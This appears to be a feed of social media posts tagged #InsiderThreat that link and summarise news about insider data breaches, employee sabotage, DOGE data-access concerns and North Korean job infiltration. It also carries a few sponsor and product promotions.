Lmst

York County, Pennsylvania incident:

An employee of a vendor that had been hired to develop software for York County Civil Courts was provided “with certain York County Civil Courts data to use for software development and testing purposes. The employee subsequently left the vendor’s employment without returning this data,” according to the county's press release.

So it seems they gave the vendor's employee REAL data to use for development and testing -- with "contact information, Social Security numbers, driver’s license or state ID card numbers, financial and medical information"

And of course, there's no evidence of misuse, but they have referred the matter to law enforcement.....

h/t, https://www.pennlive.com/news/2025/05/central-pa-county-alerts-residents-of-potential-data-leak.html

#infosecurity #govsec #insiderthreat

Today's reminder of the #insiderthreat

Some great reporting by Jason Leopold about how an insider incident at govt contractor #Opexus was the root of a massive federal #databreach

Original source: https://news.bloomberglaw.com/tech-and-telecom-law/probe-found-security-lapses-led-to-us-contractors-data-breach

Nonpaywalled source: https://www.insurancejournal.com/news/national/2025/05/21/824641.htm

DataBreaches.net had reported on the Akhter twins' arrest and conviction for an earlier insider breach back in 2015. Link to past coverage of them: https://databreaches.net/?s=akhter

Opexus, which is owned by the private equity firm Thoma Bravo and provides software services for processing US government records, was compromised in February by two employees who’d previously been convicted of hacking into the US State Department.

https://www.insurancejournal.com/news/national/2025/05/21/824641.htm

#Cybersecurity #Insiderthreat

A warm welcome to Acalvio Technologies as a Silver Sponsor of The Honeynet Project Workshop 2025 in Prague! 🐝

Acalvio’s leadership in cyber deception aligns perfectly with the workshop’s mission. If you're a company exploring deception technologies or advanced detection strategies, don’t miss the chance to connect with Acalvio during the event—they’ll be available for a chat throughout the workshop.

📅 June 2–4, 2025
🔗 https://prague2025.honeynet.org/

#Honeynet2025 #Deception #insiderthreat

Today's reminder of the #insiderthreat

"A 43-year-old Laguna Niguel, California man pleaded guilty today in U.S. District Court in Seattle to wire fraud for his scheme to steal nearly $1 million from his employer, announced Acting U.S. Attorney Teal Luthy Miller. Paul Joseph Welch was the IT manager of Kent, Washington energy manufacturing company Algas-SDI when he used various schemes to steal more than $950,000 from the company. Welch is scheduled to be sentenced by U.S. District Judge Jamal N. Whitehead on August 21, 2025."

#fraud

A cybersecurity CEO was arrested for planting malware in hospital systems. Insider threats to critical infrastructure are more real than ever. #Cybersecurity #Healthcare #InsiderThreat

https://geekoo.news/cybersecurity-ceo-caught-planting-malware-in-hospital-systems/

Former Disney employee who hacked Disney World restaurant menus in revenge sentenced to 3 years in federal prison:

https://www.justice.gov/usao-mdfl/pr/winter-garden-man-sentenced-3-years-federal-prison-conducting-series-cyber-intrusions

He got off pretty lightly considering he tampered with the allergy information on food items that could have caused life-threatning allergic reactions in some people.

#insiderthreat #revenge #infosecurity

ICYMI: Deep dive into whistleblower Berulis' claims.

"Within 15 minutes of DOGE accounts being created…Attackers in Russia tried logging in using those new creds. Correct usernames and passwords."
#InsiderThreat #DOGE #infosec #natsec #espionage
Thread: https://bsky.app/profile/mattjay.com/post/3ln2dgoksce2e

Ugh, this is more than a month old and I missed it.. the registration of a DOGE LLC

#fedramp #microsoft #doge #aws #insiderthreat

https://open.substack.com/pub/cyberintel/p/microsoft-engineer-registers-private

Share with people who may not be that aware of what Musk's #DOGE rats have been doing inside the people's protected data systems. Thank you #Harvard University for putting this online.

"Could my data be used against me?

Yes, and the risks are both immediate and long-term. In the short term, unauthorized access has already enabled targeting of individuals for harassment. For example, some employees of the United States Agency for International Development (USAID) have been “doxxed,” i.e., had their personal information released publicly, after DOGE accessed personnel files. Federal workers are reporting fear of political retaliation, with FBI officials particularly concerned about the targeting of those perceived as disloyal to the administration. While these examples involve federal employees, the data DOGE is accessing could enable similar attacks against many Americans who do not work for the federal government. Leaked data could enable identity theft, financial fraud, or targeted harassment."

#coup #corruption #infosec #InsiderThreat https://ash.harvard.edu/resources/understanding-doge-and-your-data/

"members of the DOGE team asked that their activities not be logged on the system and then appeared to try to cover their tracks behind them, turning off monitoring tools and manually deleting records of their access — evasive behavior that several cybersecurity experts interviewed by NPR compared to what criminal or state-sponsored hackers might do." ... "If he didn't know the backstory, any [chief information security officer] worth his salt would look at network activity like this and assume it's a nation-state attack from China or Russia," said Braun, the former White House cyber official. ... In the days after Berulis and his colleagues prepared a request for CISA's help investigating the breach, Berulis found a printed letter in an envelope taped to his door, which included threatening language, sensitive personal information and overhead pictures of him walking his dog, according to the cover letter attached to his official disclosure. ... "If the underlying disclosure wasn't concerning enough, the targeted, physical intimidation and surveillance of my client is. If this is happening to Mr. Berulis, it is likely happening to others and brings our nation more in line with authoritarian regimes than with open and free democracies," wrote Bakaj, his attorney
#DOGE #corruption #infosec #cybersecurity #InsiderThreat #coup #natsec https://www.npr.org/2025/04/15/nx-s1-5355896/doge-nlrb-elon-musk-spacex-security

And here's another reminder of the insider threat if you don't investigate your employees' or consultants' backgrounds and claimed credentials carefully enough. @briankrebs has the story and how a number of criminal cases may now be appealed or overturned:

Cyber Forensic Expert in 2,000+ Cases Faces FBI Probe:

https://krebsonsecurity.com/2025/04/cyber-forensic-expert-in-2000-cases-faces-fbi-probe/

#insiderthreat #fraud

Today's reminder of the insider threat involves a pharmacist in Maryland who over a period of 8 years or more, used keyloggers and installed spyware on about 400 computers at the University of Maryland Medical System so he could spy on female co-workers in private moments at work (such as changing clothes, breastfeeding their babies), and in their homes. He was reportedly fired in October 2024, and was able to get another job in another healthcare facility in Maryland because there has been no criminal charges filed against him yet and UMMS apparently didn't alert his new employer.

If Maryland law is like my state's laws, the hospital may be barred legally from revealing what happened if asked for a recommendation by the new employer. And it seems the Maryland state pharmacy board can't just suspend a license unless there's been a conviction, so the failure to have criminal charges filed already seems to have put more potential victims at risk.

Unsurprisingly, a potential class action lawsuit has already been filed against UMMS with six plaintiffs so far. There are estimates that there are more than 80 victims of the now-former employee.

Some of the media coverage on the case: https://thedailyrecord.com/2025/04/04/six-women-sue-umms-claiming-staffer-spied-on-them-after-security-breach/

#InsiderThreat #keylogger #workplace #privacy #infosec

ICYMI 7 Feb 2024 "A US Treasury Threat Intelligence Analysis Designates DOGE Staff as ‘Insider Threat’" www.wired.com/story/treasu... #InsiderThreat #cybersec #crypto #finance #Risk

A US Treasury Threat Intellige...

About the US Treasury audit due 5 April watcher.guru/news/200k-bi... Trust in DOGe? #InsiderThreat #crypto #coin #cybersec #finance #Risk

200K Bitcoin Under Review: Key...

The North Koreans and Russians have been busy, Insiders abound, and attacker tradecraft continues to evolve!

Catch all this and more in our latest wrap-up of the day's news:

🗞️ https://opalsec.io/daily-news-update-monday-april-1-2025-australia-melbourne/

There are a few noteworthy stories to get across - here's the TL;DR to get you up to speed:

🕵️ North Korean Infiltration: This is way bigger than many think. DPRK nationals are landing jobs inside global companies, gaining privileged access ("keys to the kingdom" level!). DTEX reports active investigations in 7% of their Fortune Global 2000 clients, and CrowdStrike notes nearly 40% of their NK-related IR cases involved insiders. They move fast post-hire, pivoting to supply chains and installing RATs disguised as onboarding. Watch out for highly anomalous login behaviour (like days-long sessions!). Rigorous remote hiring checks (camera on, resume checks, comms style) are crucial.

🎣 ClickFix Tactics by Lazarus: The infamous North Korean group is evolving its 'Contagious Interview' campaign (now dubbed 'ClickFake' by Sekoia). They're targeting crypto job seekers (shifting focus to non-tech roles too!) with fake website/document errors ('ClickFix'). These prompt users to run PowerShell/curl commands, dropping the 'GolangGhost' backdoor. Watch out for lures impersonating giants like Coinbase or Kraken. Sekoia has shared YARA rules – definitely worth checking out.

💻 WordPress MU-Plugin Abuse: Bad actors are getting stealthy by hiding malicious code in WordPress "Must-Use Plugins" (wp-content/mu-plugins/). These execute automatically on every page load without activation, making them hard to spot. Sucuri is seeing redirects to fake browser updates, webshell backdoors fetching code from GitHub, and JS hijackers replacing content or links. Keep those instances patched, clean up unused plugins/themes, and lock down admin accounts (MFA!).

Check out what else happened in the past 24 hours, and subscribe to get each edition straight to your inbox:
📨 https://opalsec.io/daily-news-update-monday-april-1-2025-australia-melbourne/#/portal/signup

#CyberSecurity #InfoSec #ThreatIntelligence #Hacking #DataBreach #Phishing #Malware #WordPress #NorthKorea #Russia #Ukraine #AI #SecurityCopilot #GRUB2 #Bootloaders #InsiderThreat #DataProtection #CyberAttack #infosecurity #cybersecuritynews #ClickFix

https://www.youtube.com/watch?v=rI7_MF9gO6s

🕵️‍♂️ How to Detect Dark Web Leaks with SecPoint Penetrator
Find out if your sensitive data is being leaked or sold on the dark web —
✅ Comprehensive dark web scanning
✅ Detailed reports in .txt, .html, and .pdf
✅ 100% on-premise for full data privacy
⏱️ Results delivered within a few hours

🔐 Stay ahead of cyber threats before they strike.

#CyberSecurity #DarkWeb #SecPoint #Penetrator #DataLeak #InsiderThreat #ThreatDetection #NetworkSecurity